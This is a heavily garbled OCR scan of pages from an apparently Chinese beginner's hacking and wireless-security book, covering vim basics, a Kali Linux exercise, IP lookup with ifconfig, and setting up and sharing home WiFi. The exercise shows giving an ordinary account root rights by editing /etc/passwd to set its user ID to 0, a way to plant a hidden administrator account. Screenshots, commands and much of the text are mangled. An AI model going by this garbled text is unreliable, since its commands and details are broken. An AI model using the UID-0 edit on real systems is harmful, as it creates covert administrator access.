4.10.1 认识 vim 文 本 编辑 器 


vi 编辑 器 是 所 有 Unix 及 Kali Linux 系 统 
下 标准 的 编辑 器 ， 它 相当 于 Windows 系 统 中 
的 记事 ， 它 的 强大 不 逊色 于 任何 最 新 的 文 
本 编辑 器 。 它 是 使 用 Kali Linux 系 统 中 不 能 
缺少 的 工具 。 对 于 Unix 及 Kali Linux 系 统 的 
任何 版 本 ，vi 编 辑 器 是 完全 相同 的 ， 因 此 熟 
练 掌握 该 编辑 器 是 非常 有 好 处 的 。 

vim 编 辑 器 可 以 当 作 vi 编 辑 器 的 升级 版 
本 ， 它 可 以 用 多 种 颜色 的 方式 来 显示 一 些 
特殊 的 信息 ， 依 据 文件 扩展 名 或 者 是 文件 
内 的 开头 信息 ， 判 断 该 文件 的 内 容 从 而 自 
动 的 执行 该 程序 的 语法 判断 ， 再 以 颜色 来 
显示 程序 代码 与 一 般 信 息 。 并 且 它 加 入 了 
很 多 额外 的 功能 ， 例 如 支持 正则 表达 式 的 
搜索 、 多 文件 编辑 、 块 复制 ， 等 等 。 


4.10.2 vim 的 三 种 模式 


vim 有 三 种 模式 ， 分 别 是 命令 模式 、 插 
入 模式 、 编 辑 模 式 ， 如 下 图 所 示 。 
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进入 退出 > 
vi filename 输入 : wq 
; 命令 以 回 车 
SND A 结束 运行 
插入 模式 编辑 模式 


vim 三 种 模式 的 功能 介绍 如 下 : 

e 命令 模式 默认) : 刚 进 入 vim 的 时 
候 ， 默 认 便 是 命令 模式 ， 可 以 复制 
行 ， 删 除 行 等 。 

e 插入 模式 : 可 以 输入 内 容 。 


。 编辑 模式 ， 在 最 下 边 出 现 “: ”时 幅员 和 


便 进 入 了 编辑 模式 ， 除 进行 编辑 外 国 

还 可 以 输入 诸多 管理 员 命令 。 
vim 三 个 模式 之 间 可 以 自由 切换 ， 其 
中 ， 命 令 模 式 可 以 通过 下 面 这 些 快 捷 键 切 


换 到 插入 模式 : 

。 i: 在 当前 光标 所 在 字符 的 前 面 ， 转 
为 插入 模式 。 

。 I: 在 当前 光标 所 在 行 的 行 首 转换 为 
插入 模式 。 

ea: 在 当前 光标 所 在 字符 的 后 面 ， 转 
为 插入 模式 。 

。 A: 在 光标 所 在 行 的 行 尾 ， 转 换 为 
插入 模式 。 


e o: 在 当前 光标 所 在 行 的 下 方 ， 新 建 
一 行 ， 并 转 为 插入 模式 。 
。 O: 在 当前 光标 所 在 行 的 上 方 ， 新 
建 一 行 ， 并 转 为 插入 模式 。 
在 插入 模式 下 ， 可 以 通过 按 下 Esc 键 
切换 为 命令 模式 ， 在 命令 模式 下 ， 输 入 
“: ”可 切换 为 编辑 模式 。 


4.10.3 使 用 vim 打 开 文 件 


使 用 vim 打 开 文 件 的 方法 主要 有 以 下 几 
种 ， 下 面 分 别 进行 介绍 : 

(1) vim /path/to/somefile 。vim 后 跟 文 
件 路 径 及 文件 名 ， 如 果 文 件 存 在 ， 则 打开 
编辑 文件 窗口 ， 如 果 文 件 不 存在 ， 则 创建 
文件 。 
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(2) vim +#。 打 开 文件 ， 并 定位 到 第 # 
行 ，# 代表 数字 。 

例如 : 输入 vim +3 /ect/flas.ini 命 令 ， 如 
下 图 所 示 。 


how (or TOET actIon OTTSE-S IT 
9: no offsets 


T5355en0ty 


1: relative offsets from the start of action block 

2: absolute offsets from the start of SWF 

howoffset = 9 

8: show offsets above in decinal forn, 1: ln hexadecinal forml 


(3) vim +。 打 开 文 件 ， 定 位 到 最 后 


输入 vim + /etc/flasm.ini 命 令 ， 如 
下 图 所 示 。 


TUaTEST IT SET TO TU3DTOWSEF alts the DrOVSET aTter UPdate 
laplayer \PROGRA~1\FLASHM~1\ PLAYERS\SAFLASHPLAYER. EXE 
labrowser ~ C:\PROGRA~L\INTERN~I\IEXPLORE .EXE 

latest = flabrowser 

" /etc/flasn.ini* 45L, 1745C 45,1 层 沿 


(4) vim +/PATTERN。 打 开 文件 ， 定 位 
到 第 一 次 被 PATTERN 匹配 到 的 行 的 行 首 。 

例如 : 输入 vim +/fla /etc/flasm.ini 命 
令 ， 如 下 图 所 示 。 


THE OPTIONS CONTTOU WOT TIPPETS WER FUOSN TS -ESTTEITTFOR 
Flash 5 and Flash NX only, see “Embedding Flasn code” in flas 
tlaplayer: path to tla 


flabrowser: path to FL 
on windows, path Shout erefore 0D05 forma 
flatest fter update 


flates calls the bn after updare 
ap Mor -CNPROGRAZINPLASHNLiNELAYERSNSAFLASHPLAYER EXE 
[uabrowser = C:VPROGRA~ININTERN~1NIEXPLORE .EXE 

latest = flabrowser 


37,1 必 贡 


实战 演练 


实战 演练 1 一 一 创建 普通 账户 提升 管理 权 
限 


4.11 


给 Kali Linux 操 作 系 统 创建 一 个 账户 ， 
并 修改 该 账号 为 管理 员 权 限 。 
使 用 adduser 命 令 添加 一 个 test001 的 账 
号 ， 如 下 图 所 示 。 


[FooTOrati: /hone/ Test# adduser testooT 
Adding user ‘testo01' ... 
Adding new group “testee1' (1991) ... 
Adding new user "teste91，(1999) with group 
Creating home directory ‘/hone/teste01' ... 
(Copying files from ‘/etc/skel' ... 
Enter new UNIX password: 
Retype new UNIX password: 
passwd: password updated successfully 
[Changing the user information for test961 
Enter the new value, or press ENTER for the default 
Full Name []: 
Room Number []: 
Work Phone []: 
Home Phone []: 
other []: 
[rs the information correct? [Y/n] y 


“test691 7 
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[step 图 使 用 su 命令 切换 到 test001 账 户 ， 执 行 
useradd 命 令 ， 发 现 没有 权限 ， 如 下 图 所 示 。 


testoo1@kali: /home/test$ useradd test992 


useradd: Permission denied. 
useradd: cannot lock /etc/passwd; try again later. 
testo01@kali: /home/test$ 四 


侈 注意 : 管理 员 账 号 使 用 # 作 为 命令 提示 
符 ， 而 普通 用 户 使 用 $ 作 为 命令 提示 符 。 
[step 图 使 用 vi 打开 /etc/passwd 文 件 ， 可 以 看 
到 root 账 号 的 用 户 ID 为 0 组 ID 也 为 0， 在 文件 
的 末尾 是 新 加 账户 test001, 用 户 ID1000， 如 
下 图 所 示 。 


[Fle Edt View Search Termina Hep 


s+ /UST/ sbin/nologin 

n /usr/ sbin/nologin 

/beef-xss: /usr/sbin/nologin 

142:Gnome Display Manager:/var/Lib/9dn3:/bin/false 
a 4:/sbin/nelogin 


Debian-gdn:x:1: 
systemd-coredul 
pebian-snnp:x 

testeel:x:1998: 


[step 园 修改 test001 账 户 ID 为 0， 再 次 切换 账 
户 发 现 test001 已 经 为 管理 员 ， 如 下 图 所 示 。 


二 


/bin/false 
1: /bin/bash 


VHT TURT VN -an on 7uS 7 7 SDIN ROL DOIN 
wn/pulse: /usr/sbin/nologin 


9dnys /bin/ false 
+ /sbin/nologin 
7:122: 1/var/ /enap: /bin/ tatse 

/Mone/ testoo1: /bin/bash 


再 次 从 root 账 户 切换 到 test001 账 户 ， 
此 时 test001 已 经 具有 管理 员 权 限 ， 如 下 图 
所 示 。 


Poot /hone/ tosty su 65196T 
root@kali: /hone/test# whoani 
root 

Foot@kali:/hone/test# 轩 


实战 演练 2 一 一 通过 命令 获取 到 本 机 IP 
地 址 


通过 命令 获取 到 本 地 IP 地 址 可 以 通过 
以 下 几 个 步 又: 
[step 回 使 用 ifconfig 命 令 查 看 本 机 网 卡 及 IP 地 
址 ， 如 下 图 所 示 。 


foam reonTy 
[hes fagsT4163<Up BpoapcAsr, RUNNING,MULTICAST> ntu 1500 ] 
19168 30138 permask 23S，55S-235 9 broadeast 192 168 .3.2 


inet6 fe8e: :28c:29ff'fe7f:39f2 prefixlen 64 scopeid 8x28<Link> 
ether 69:9c:29:7f:39.f2 txqueuelen 1000 (Ethernet) 

RX packets 3117 bytes 232891 (227.4 KIB) 

RX errors 9 dropped © overruns © frane © 

TX packets 478 bytes 42285 (41.2 KiB) 

T errors 9 dropped 9 overruns 9 carrier @ collisions ® 


73<UP, LOOPEACK ,RUNNING> mtu 65536 


:1 prefixlen 128 scopeid Oxl0<host> 
Toop txqueuelen 1988 (Local Loopback) 

Rx packets 32 bytes 1836 (1.7 KiB) 

Rx errors 9 dropped © overruns 9 frane 日 

TX packets 32 bytes 1836 (1.7 KiB) 

TY errors 日 dropped © overruns 8 carrier 9 collisions 8 


step 图 使 用 ifconfig eth0 命 令 过 滤 掉 本 地 回 
a 只 显示 出 eth0 外 网 人 PP 地址， 如 下 图 
所 示 。 


Faatgkaris-y ITcaonmfig etng 

etha: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1589 
inet 192.168.5.130 netmask 255.255.255.9 broadcast 192.168.5.253 

inet6 fe89::28c:29Tf;fe7f:39f2 prefixlen 64 scopeid gx26<tink> 

ether 00:0c:29:7f:39:f2 txqueuelen 1998 (Ethernet) 

RX packets 3206 by 238549 (232.9 KiB) 

RX errors 0 dropped 6 overruns 0 frame © 

TX packets 478 rs a IAT Kin) 

TX error s @ dropped 


overruns rier 9 cottision 


悉 无 线 网 络 安全 测试 平台 一 一 Kali Linux 系 统 的 基本 操作 ES 


ep IfeonTig ctholgrep "inet" eut dm Taleut dt -TF 2T 


[192.168"5.130 


小 试 身手 


练习 1: 使 用 cd 命令 与 ls 命令 切换 目录 
并 查看 目录 中 的 内 容 ， 熟 悉 各 个 目录 中 存 


4.12 


step 国 使 用 ifconfig gy 过 
滤 出 包 全 全 人 内 容 ， 如 下 图 所 示 。 


FaaEERSUE-F ITCONTI9 etholgre 
inet 1921685°130 Snetnask 255.255.255.0 broadcast 192.168.5.255 
inet6 fe88: ;26c:29ff:fe7f:39f2 prefixlen 64 scopeid 8x20<tinkz 


step 回 使 用 ifconfig eth0lgrep "inet" | cut -d 
- 亿 命 令 ， 过 滤 出 inet 字 段 第 一 行 ， 如 
下 图 所 示 。 


[rootBkatis-# ifconfig ethelgrep "inet" | 
het 192016895 136190cfnaake2551258-255 967 broadcnst 192.168.5.255| 


人 


step 国 使 用 ifconfig eth0lgrep "inet" | cut -d ":" 
-人 2 | cut -d "t" - 亿 命 令 过 滤 掉 inet 字 段 ， 如 下 
图 所 示 。 


UE TCT ET TIEE Te rr 
192.168.5.130 ne 


-TT eo dt 2 


[ep 加 使 用 ifconfig etholgrep "inet"|cut -d":" 
- 亿 |cut -d "t" -f 2|cut -d "n" -fl 命令 ， 过 滤 掉 
后 n 字 符 后 面 的 内 容 ， 获 取 到 完整 的 本 机 JP 
地 址 ， 如 下 图 所 示 。 


放 哪些 文件 。 

练习 2: 使 用 文件 查看 命令 检查 日 志 
信息 。 

练习 3: 试 着 使 用 文件 搜索 命令 查找 需 
要 的 文件 位 置 。 

练习 4: 熟练 使 用 账户 管理 命令 ， 学 会 
如 何 添加 及 删除 账户 。 

练习 5: 试 着 使 用 文件 解压 缩 命令 ， 创 
建 压 缩 文 件 并 解压 ， 对 比 不 同 解压 缩 命 令 
的 区 别 。 

练习 6: 使 用 系统 操作 命令 查看 系统 
进程 。 

练习 7: 熟练 使 用 vi/vim 编 辑 器 ， 学 会 
打开 文件 快速 查找 、 修 改 、 保 存 文件 。 


Vi 


第 5 音 组建 无 线 安 全 网 络 


在 无 线 局 域 网 WLAN 发 明之 前 ， 人 们 要 想 通 过 网 络 进行 联络 和 通信 ， 必 须 先 用 网 线 组 
建 一 个 有 线 网 络 。 不 过 ， 这 种 有 线 网 络 无 论 组 建 、 拆 装 还 是 在 原 有 基础 上 进行 重新 布局 和 


改建 ， 都 非常 困难 ， 且 成 本 和 代价 也 非常 高 ， 


5.1 认识 无 线 局 域 网 


无 线 局 域 网 是 通过 无 线 通 信 技 术 进 行 
组 网 的 一 个 结合 产物 ， 它 采用 无 线 电 波 、 
红外 线 或 激光 ， 通 过 无 线 通信 传输 媒介 代 
蔡 传 统 网 线 ， 构 成 传统 无 线 局 域 网 的 功 
能 ， 能 够 使 用 户 随时 、 随 地 进行 上 网 。 


无 线 局 域 网 的 优点 
与 传统 有 线 网 络 相 比 ， 无 线 网 络 具 有 


(1) 灵活 性 。 在 有 线 网 络 中 ， 网 络 设 
“ 备 的 安放 位 置 受到 网 络 位 置 的 限制 ， 而 无 
线 网 络 则 没有 ， 只 要 在 信号 覆盖 范围 内 ， 
都 可 以 接 入 网 络 。 

(2) 移动 性 。 无 线 网 络 的 最 大 优点 在 
于 它 的 移动 性 ， 接 入 的 用 户 可 以 在 覆盖 范 
围 内 随意 移动 ， 且 还 能 保持 网 络 的 连接 。 

(3) 方便 安装 。 无 线 网 络 可 以 最 大 程 
度 地 减少 网 络 布线 ， 一 般 只 须 安装 一 个 或 
多 个 接 入 点 设备 ， 这 样 便 可 以 建立 起 一 个 
覆盖 面 广 的 网 络 区 域 。 

(4) 方便 规划 和 调整 。 对 于 有 线 网 络 
而 言 ， 办 公 地 点 或 网 络 拓扑 的 改变 通常 需 


= 中 要 重新 建 网 ， 而 无 线 网 络 则 可 以 避免 或 减 


- 少 这 些 情况 的 发 生 。 

(5) 故障 定位 容易 。 有 线 网 络 一 旦 出 现 
物理 故障 ， 尤 其 是 由 于 线路 中 断 或 线路 不 
良 造成 的 网 络 故障 ， 往 往 很 难 查找 原因 ， 
并 且 线 路 检修 也 需要 付出 很 大 的 代价 ， 无 


于 是 无 线 组 网 方式 应 运 而 生 。 


线 网 络 则 不 同 ， 故 障 容易 定位 ， 定 位 后 更 
换 故障 设备 即 可 恢复 网 络 。 

(6) 易于 扩展 。 无 线 网 络 有 多 种 配置 
方式 ， 可 以 很 快 从 只 有 几 个 用 户 的 小 型 局 
域 网 扩展 到 上 千 用 户 的 大 型 网 络 ， 并 且 还 
有 节点 间 漫 游 的 特性 ， 这 些 是 有 线 网 络 所 
不 能 实现 的 。 


5.1.2 无 线 局 域 网 的 缺点 


无 线 网 络 的 缺点 主要 体现 在 性 能 、 速 率 
与 安全 性 三 个 方面 ， 下 面 进行 详细 介绍 : 

(1) 性 能 。 无 线 网 络 是 依靠 无 线 电波 进 
行 传输 的 ， 因 此 无 线 电 波 受到 遮挡 或 者 其 
他 电波 干扰 都 可 能 阻碍 电磁 波 传输 ， 受 到 
这 些 外 因 影 响 会 直接 导致 网 络 性 能 降低 。 

(2) 速率 。 无 线 信道 的 传输 速率 与 有 
线 信道 相 比 要 低 得 多 ， 虽 然 无 线 网 络 还 在 
不 断 的 发 展 ， 目 前 已 经 能 达到 最 快 500Mb/s 
的 传输 速率 ， 但 是 与 有 线 网 络 的 千 兆 传输 
速率 相 比 还 是 有 差距 的 。 

(3) 安全 性 。 由 于 无 线 传输 的 特性 导 
致 无 线 传输 是 发 散 的 ， 不 要 求 建立 物理 连 
接 通 道 ， 因 此 从 理论 上 讲 ， 很 容易 被 监听 
造成 信息 泄露 。 


5.1.3 ”无 线 局 域 网 的 组 网 模型 


无 线 局 域 网 有 其 方便 灵活 的 特性 ， 当 
然 它 也 有 自己 的 基本 组 网 模型 ， 如 下 图 所 
示 。 该 组 网 模型 的 组 成 元 件 包括 站 点 、 接 
入 点 、 无 线 介质 、 分 布 式 系统 等 。 


接 入 点 


ae 
一 国 


(1) 站 点 。 配 置 网 络 的 目的 ， 是 为 了 
在 站 点 之 间 传 送 数据 。 所 谓 站 点 ， 是 指 配 
备 无 线 网 络 接口 的 计算 设备 ， 即 带 有 无 线 
网 卡 的 通信 设备 ， 如 笔记 本 计算 机 、 手 机 、 
iPad 等 无 线 设备 。 

(2) 接 入 点 。 无 线 网 络 所 使 用 的 帧 必 
须 经 过 转换 ， 才 能 被 传递 至 其 他 不 同类 型 
的 无 线 设备 。 有 具备 无 线 至 有 线 桥接 功能 
的 设备 称 为 接 入 点 (简称 AP) ， 如 无 线 局 
域 网 中 的 无 线路 由 器 ， 就 是 一 个 简单 的 接 
入 点 。 

(3) 无 线 介质 。IEEE 802.11 标准 以 无 
线 介 质 (Wireless medium) 在 工作 站 之 间 
传递 数据 帧 。 其 所 定义 的 物理 层 不 止 一 种 ; 
这 种 架构 允许 多 种 物理 层 同 时 支持 802.11 
MAC - 802.11 最 初 标准 化 了 的 两 种 射频 
(radio frequency， 简 称 RF) 物理 层 以 及 一 
种 红外 线 (infrared ) 物理 层 ， 然 而 事后 证 
明 RF 物理 层 较 受 欢迎 。 

(4) 分 布 式 系统 。 当 几 个 接 入 点 串联 
以 覆盖 较 大 区 域 时 ， 彼 此 之 间 必 须 相互 通 
信 ， 才 能 够 掌握 移动 式 工作 站 的 行踪 。 
而 分 布 式 系统 (distribution system) 属于 
802.11 的 逻辑 元 件 ， 负 责 将 帧 〈frame) 转 
送 至 目的 地 。 


和 荨 洲 出 卦 冰 


5.1.4 ”认识 无 线 连 接 方式 


说 起 WiFi 大 家 都 知道 可 以 无 线 上 网 ， 
其 实 ，WiFi 是 一 种 无 线 连接 方式 ， 并 不 是 
无 线 网 络 或 者 是 其 他 无 线 设 备 。 

WiFi 是 一 个 无 线 网 络 通信 技术 的 品 
牌 ， 由 WiFi 联 盟 (WiFi Alliance) 所 持 有 。 
目的 在 于 改善 基于 IEEE 802.11 标 准 的 无 线 
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网 络 产品 之 间 的 互通 性 。WiFi 联 盟 成 立 于 
1999 年 ， 当 时 的 名 称 叫 作 Wireless Ethernet 
Compatibility Alliance (WECA)， 在 2002 年 
10 月 ， 正 式 改名 为 WiFi Alliance。 

以 前 通过 网 线 连接 计算 机 ， 自 从 有 了 
WiFi 技 术 ， 则 可 以 通过 无 线 电波 来 联网 ; 
常见 的 无 线 网 络 设 备 就 是 一 个 无 线路 由 
器 ， 那 么 在 这 个 无 线路 由 器 的 电波 覆盖 的 
有 效 范围 内 ， 都 可 以 采用 WiFi 连 接 方式 进 
行 联网 ， 如 果 无 线路 由 器 连接 了 一 条 ADSL 
线路 或 者 别 的 上 网 线路 ， 则 无 线路 由 器 又 
可 以 被 称 为 一 个 “热点 ”。 


组 建 一 个 简单 的 无 线 网 络 


无 线 局 域 网 络 的 搭建 给 无 线 办 公 带 来 
了 很 多 方便 ， 而 且 可 随意 改变 办 公 位 置 而 
不 受 束缚 ， 大 大 适合 了 现代 人 的 追求 。 


5.2.1 搭建 无 线 网 环境 


建立 无 线 局 域 网 的 操作 比较 简单 ， 在 台 
有 线 网 络 到 户 后 ， 用 户 只 须 连 接 一 个 具有 
无 线 WiFi 功 能 的 路 由 器 ， 然 后 各 房间 里 的 
计算 机 、 笔 记 本 计算 机 、 手 机 和 iPad 等 设 
备 利用 无 线 网 卡 与 路 由 器 之 间 建 立 无 线 连 
接 ， 即 可 构建 整个 办 公 室 的 内 部 无 线 局 域 
网 ， 下 图 为 一 个 无 线 局 域 网 连接 示意 图 。 


Internet 
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安装 无 线 网 卡 的 
笔记 本 计算 机 一 
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SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


向 5.2.2 配置 无 线 局 域 网 


. 建立 无 线 局 域 网 的 第 一 步 就 是 配置 无 
线路 由 器 ， 默 认 情况 下 ， 具 有 无 线 功能 的 
路 由 器 不 开启 无 线 功 能 ， 需 要 用 户 手动 配 
置 ， 在 开启 了 路 由 器 的 无 线 功能 后 ， 下 面 
就 可 以 配置 无 线 网 了 。 
使 用 计算 机 配置 无 线 网 的 操作 步骤 
如 下 。 
[step 图 打开 IE 浏览 器 ， 在 地 址 栏 中 输入 路 
由 器 的 网 址 ， 一 般 情 况 下 路 由 器 的 默认 
网 址 为 “192.168.0.1”， 输 入 完毕 后 单 击 
“ 转 至 ”按钮 ， 即 可 打开 路 由 器 的 登录 窗 
口 ， 如 下 图 所 示 。 
OD TLWRsssN x Ee 


万 [we 


TP-LINK 


step 图 在 “请 输入 管理 员 密 码 ” 文 本 框 中 输 
入 管理 员 的 密码 ， 默 认 情 况 下 管理 员 的 密 
码 为 “123456”， 如 下 图 所 示 。 


口 TLWReb5N x 本 加 到 | 
€ 3 ©O | | 
TP-LUNK 

请 输入 管理 员 密 码 
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[step 图 单 去 “确认 ”按钮 ， 即 可 进入 路 由 器 
的 “运行 状态 ”工作 界面 ， 在 其 中 可 以 查 
看 路 由 器 的 基本 信息 ， 如 下 图 所 示 。 


口 mrwasssn x 


© >0|m 


TIP-LINK 
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oO 
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[step 图 选择 窗口 左 侧 的 “无 线 设置 ” 选 
项 ， 在 打开 的 子 选 项 中 选择 “基本 信息 ” 
选项 ， 即 可 在 右 侧 的 窗 格 中 显示 无 线 设置 
的 基本 功能 ， 并 选中 “开始 无 线 功能 ”和 
“开启 SSID 广 播 ” 复 选 框 ， 如 下 图 所 示 。 


当 开 启 了 路 由 器 的 无 线 功 能 后 ， 单 击 

“保存 ”按钮 进行 保存 ， 然 后 重新 启动 路 
由 器 ， 即 可 完成 无 线 网 的 设置 ， 这 样 具有 
WiFi 功 能 的 电子 设备 就 可 以 与 路 由 器 进行 
无 线 连接 ， 从 而 实现 共享 上 网 。 


5.2.3 ”将 计算 机 接 入 无 线 网 


笔记 本 计算 机 具有 无 线 接 入 功能 ， 台 式 
计算 机 要 想 接 入 无 线 网 ， 需 要 购买 相应 的 无 


线 接收 器 ， 这 里 以 笔记 本 计算 机 为 例 ， 介 绍 
如 何 将 计算 机 接 入 无 线 网 ， 具 体 的 操作 步骤 
如 下 。 

[step 图 双击 笔记 本 计算 机 桌面 右 下 角 的 无 
线 连接 图 标 ， 打 开 “ 网 络 和 共享 中 心 ” 窗 
口 ， 在 其 中 可 以 看 到 计算 机 的 网 络 连 接 状 
态 ， 如 下 图 所 示 。 


| Ms = 面 这 


个 生 = 网 阁 和 Inte.。， 网 和 共享 中 心 


| 
a 坦 看 基本 网 络 信息 并 设置 法 
Wn 
2 全 前科 有 过 到 有 网站 
i 
更 A 周明 
a 


或 VPN 注 接 ， 或 设 条 由 革 或 到 入 点. 


Co 
冯 亲 开展 所 网 洛 问 加 ,可 者 天 得 呈 光 凤 各 于 


家 


[step 图 单 去 笔记 本 计算 机 桌面 右 下 角 的 无 线 
连接 图 标 ， 在 打开 的 界面 中 显示 了 计算 机 
自动 搜索 的 无 线 设备 和 信号 状态 ， 如 下 图 
所 示 。 


666666 
family 
埃 fhpre-HSIF 


TP-UNKI 


LU 66 
希 TP-UNK 5666 


[Bep 图 单 击 一 个 无 线 连 接 设备 ， 展 开 无 线 
连接 功能 ， 在 其 中 选中 “自动 连接 ” 复 选 
框 ， 单 击 “ 连 接 ” 按 钮 ， 如 下 图 所 示 。 
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-UNK_6666 
质 TP-UNK_6666 


[Se 图 在 打开 的 界面 中 输入 无 线 连接 设备 的 
连接 密码 ， 单 击 “ 下 一 步 ” 按 钮 ， 如 下 图 
所 示 。 


step 图 开始 连接 网 络 ， 如 下 图 所 示 。 


过 TP-UNK1 


RM mywifi 


step 较 连接 到 网 络 之 后 ， 桌 面 右 下 角 的 无 线 
连接 设备 显示 正常 ， 并 以 弧 线 的 方法 给 出 
信号 的 强 弱 ， 如 下 图 所 示 。 
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[step 国 再 次 打开 “网 络 和 共享 中 心 ”窗口 ， 
在 其 中 可 以 看 到 计算 机 当前 的 连接 状态 ， 
如 下 图 所 示 。 


种 网 络 和 共享 中 心 s” .本 要 
个 复 < 网 和 I.，、 网 阁 和 夫 训 中 心 ~ 已 | | es p 
舍 忌 
控制 面 要 主页 查看 基本 网 络 信息 并 设置 连接 
豆 要 活 芭 网 阁 
更 Ri 本 车 设 秆 
FE Inemet 
要 TP-UNKY 
es ee 尘 WAN 
CTP-UNKT) 
更 玫 网 阁 设 轩 


i a 
届 本 完 抽 、 接 3 或 VPN 连 二 ;或 于 牙 由 新 或 缔 入 点。 


同时 省 骨 等 
诊断 寺 们 提交 客 髓 是 ”或 者 甘 短 从 角 关 信 息 . 


全 无 线 局 域 网 配置 完成 后 ， 用 户 可 以 将 
手机 接 入 WiFi， 从 而 实现 无 线 上 网 ， 这 里 
以 Android 系 统 为 例 演示 手机 接 入 WiFi 具 体 
操作 步 又 如 下 。 

[step 国 在 手机 界面 中 用 手指 点 按 “ 设 置 ” 
图 标 ， 进 入 手机 的 “设置 ”界面 ， 如 下 图 


所 示 。 
下 午 2,44 可 :看 中 国电 信 CE 57% 
设置 
@ 移动 网 络 
© wLAN 已 关闭 
© uF 已 关闭 
人 @ 其 他 连接 方式 


四 通知 和 状态 栏 

© set 

图 个性 主 是 

加 了 体 Mi 


A th CE 


step 图 使 用 手指 点 按 WLAN 右 侧 的 “已 关 
闭 ”， 开 启 手机 WLAN 功 能 ， 并 自动 搜索 
周围 可 用 的 WLAN， 如 下 图 所 示 。 
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42 © 7 PM CE se% 
WLAN 
开启 WLAN . 
ChinaNet-H5TF 
TP-LINKT a 
TP-UINK2 a 


TP-LINK_38F156 
TP-LINK_6666 
fhpre-H5TF 


mywif 


© 


step 图 使 用 手指 点 按 可 用 的 WLAN， 弹 出 连接 


界面 ， 在 其 中 输入 相关 密码 ， 如 下 图 所 示 。 


TP-LNK1 


国 中 
lsassla 
alslolelelslslxli] 


悦目 四 日 上 日 四 四 区 
DHT-TEE 


step 加 点 按 “ 连 接 ” 按 钮 ， 即 可 将 手机 接 入 
WiFi， 并 在 下 方 显示 “已 连接 ”字样 ， 这 
样 手 机 就 接 入 了 WiFi， 然 后 就 可 以 使 用 手 
机 进行 上 网 了 ， 如 下 图 所 示 。 


Tia 


WLAN 


S52 日 了 2 Ha Cm so 


开启 WLAN . 


TP-LINKT 


ChnaNet-H5TF 


TP-LINKZ 


fhpre-H5TF 


mywif a 


wanghua a 


5.3 ”计算 机 和 手机 共享 无 线 上 网 


随 着 手机 上 网 的 普及 ， 计 算 机 和 手机 的 
网 络 是 可 以 互相 共享 的 ， 这 在 一 定 程度 上 方 
便 了 用 户 ， 例 如 ， 如 果 手 机 共享 计算 机 的 网 
络 ， 则 可 以 节省 手机 上 网 产生 的 流量 费用 ; 
如 果 自 己 的 计算 机 不 在 有 线 网 络 环境 中 ， 则 
可 以 利用 手机 的 流量 进行 计算 机 上 网 。 


5.3.1 手机 共享 计算 机 的 网 络 

计算 机 和 手机 网 络 的 共享 需要 借助 
第 三 方 软件 ， 这 样 可 以 使 整个 操作 简单 
方便 ， 这 里 以 借助 “360 免 费 WiFi” 软 件 
为 例 进行 介绍 。 
[sep 加 将 计算 机 接 入 WiFi 环 境 当 中 ， 如 下 图 


所 示 。 
FE 到 
隐 
i 
i 均 看 基本 网络 信息 并 疫 置 连 
ee 
niente _ 
更 改 高 要 天 享 设置 TP-UNKY ms oe 


[step 图 在 计算 机 中 安装 “360 免 费 WiFi” 
软件 ， 然 后 打开 其 工作 界面 ， 在 其 中 设置 
WiFi 名 称 与 密码 ， 如 下 图 所 示 。 


3EOamwi 
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step 图 打开 手机 的 WLAN 搜 索 功 能 ， 可 以 看 
到 搜索 出 来 的 WiFi 名 称 ， 如 这 里 是 LB- 
LINK1， 如 下 图 所 示 。 


step 图 使 用 手指 点 按 LB-LINK1， 即 可 打开 
WiFi 连 接 界面 ， 在 其 中 输入 密码 ， 如 下 图 
所 示 。 


[Sep 图 点 按 “ 连 接 ” 按 钮 ， 手 机 就 可 以 通过 
计算 机 发 射出 来 的 WiFi 信 号 进行 上 网 了 ， 
如 下 图 所 示 。 
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Eee 图 返回 到 计算 机 工作 环境 当中 ， 在 
“360 免 费 WiFi” 的 工作 界面 中 选择 “已 经 
连接 的 手机 ”选项 卡 ， 则 可 以 在 打开 的 界 
面 中 查看 通过 此 计算 机 上 网 的 手机 信息 ， 
如 下 图 所 示 。 


ET 


1 台 手 机 安全 上 网 中 ， 无 人 蹦 网 


华为 C8815 
ns 


时 5.3.2 计算 机 共享 手机 的 网 络 

手机 可 以 共享 计算 机 的 网 络 ， 计 算 机 也 可 
以 共享 手机 的 网 络 ， 这 里 以 Android 手 机 为 例 
演示 手机 共享 网 络 ， 具 体 的 操作 步 又 如 下 。 

Estee 加 打开 手机 ， 进 入 手机 的 设置 界面 ， 
在 其 中 使 用 手指 点 按 “ 便 携 式 WLAN 热 
点 ”， 开 启 手机 的 便携 式 WLAN 热 点 功 
能 ， 如 下 图 所 示 。 


便携 式 WLAN 热点 


配置 WLAN 热点 
i 


EG 返回 到 计算 机 的 操作 界面 ， 单 去 右 
下 角 的 无 线 连接 图 标 ， 在 打开 的 界面 中 显 
示 了 计算 机 自动 搜索 的 无 线 设备 和 信号 状 
态 ， 这 里 就 可 以 看 到 手机 的 无 线 设备 信息 
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“HUAWEI C8815”， 如 下 图 所 示 。 


step 图 单 击 手 机 无 线 设 备 ， 即 可 打开 其 连接 
界面 ， 如 下 图 所 示 。 


质 TPUNKI 


又 HUAWEFI C8815 
{8 


[Bep 园 单 去 “连接 ”按钮 ， 将 计算 机 通过 手 
机 设备 连接 网 络 ， 如 下 图 所 示 。 


抬 TPUNKI 


所 mywifi 


[step 图 连接 成 功 后 ， 在 手机 设备 下 方 显示 
“已 连接 ， 开 放 ” 信 息 ， 其 中 的 “开放 ” 
表示 该 手机 设备 没有 进行 加 密 处 理 ， 如 下 
图 所 示 。 


全 ee 


质 TP-UNKG 


侈 提 示 : 至 此 ， 就 完成 了 计算 机 通过 手机 
上 网 的 操作 ， 这 里 需要 注意 的 是 一 定 要 时 
刻 关注 手机 的 上 网 流量 。 


5.4 实战 演练 


实战 演练 1 一 一 加 密 手机 的 WLAN 热 点 
功能 


为 保证 手机 的 安全 ， 一 般 需要 给 手机 
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的 WLAN 热 点 功能 添加 密码 ， 具 体 的 操作 PT 
步骤 如 下 。 御 入 网 络 安全 忘记 
[step 图 在 手机 的 移动 热点 设置 界面 中 ， 点 按 A 
“配置 WLAN 热 点 ”功能 ， 在 弹出 的 界面 
中 点 按 “ 开 放 ” 选 项 ， 可 以 选择 手机 设备 
oe 实战 演练 2 一 将 计算 机 收藏 天 网 址 同步 
到 手机 

使 用 360 安 全 浏览 器 可 以 将 计算 机 收藏 
夹 中 的 网 址 同步 到 手机 当中 ， 其 中 360 安 全 
浏览 器 的 版 本 要 求 在 7.0 以 上 ， 上 有 具体 的 操作 
步骤 如 下 。 
